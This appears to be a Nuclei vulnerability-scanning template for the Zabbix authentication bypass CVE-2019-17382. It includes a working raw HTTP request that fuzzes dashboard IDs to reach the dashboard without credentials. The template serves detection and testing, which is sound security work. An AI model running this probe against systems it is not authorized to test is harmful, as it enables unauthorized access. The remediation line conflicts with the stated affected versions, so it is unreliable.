id: CVE-2019-17382 info: name: Zabbix <=4.4 - Authentication Bypass author: harshbothra_ severity: critical description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. remediation: | Upgrade to a patched version of Zabbix (>=4.4) to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/47467 - https://nvd.nist.gov/vuln/detail/CVE-2019-17382 - https://lists.debian.org/debian-lts-announce/2023/08/msg00027.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2019-17382 cwe-id: CWE-639 epss-score: 0.3141 epss-percentile: 0.96485 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 100 vendor: zabbix product: zabbix tags: fuzz,auth-bypass,login,edb,cve,cve2019,zabbix http: - raw: - | GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 Host: {{Hostname}} payloads: ids: helpers/wordlists/numbers.txt stop-at-first-match: true threads: 50 matchers-condition: and matchers: - type: word words: - "Dashboard" - type: status status: - 200 # digest: 4a0a004730450220524419ed0a2b829f401c626239fe2f46bd60ad63747f81c27031437795711b70022100d46fce3f30f38d35814ae6ac74a46dc2dc47cd397e1cca96defaf33370651e0a:922c64590222798bb761d5b6d8e72950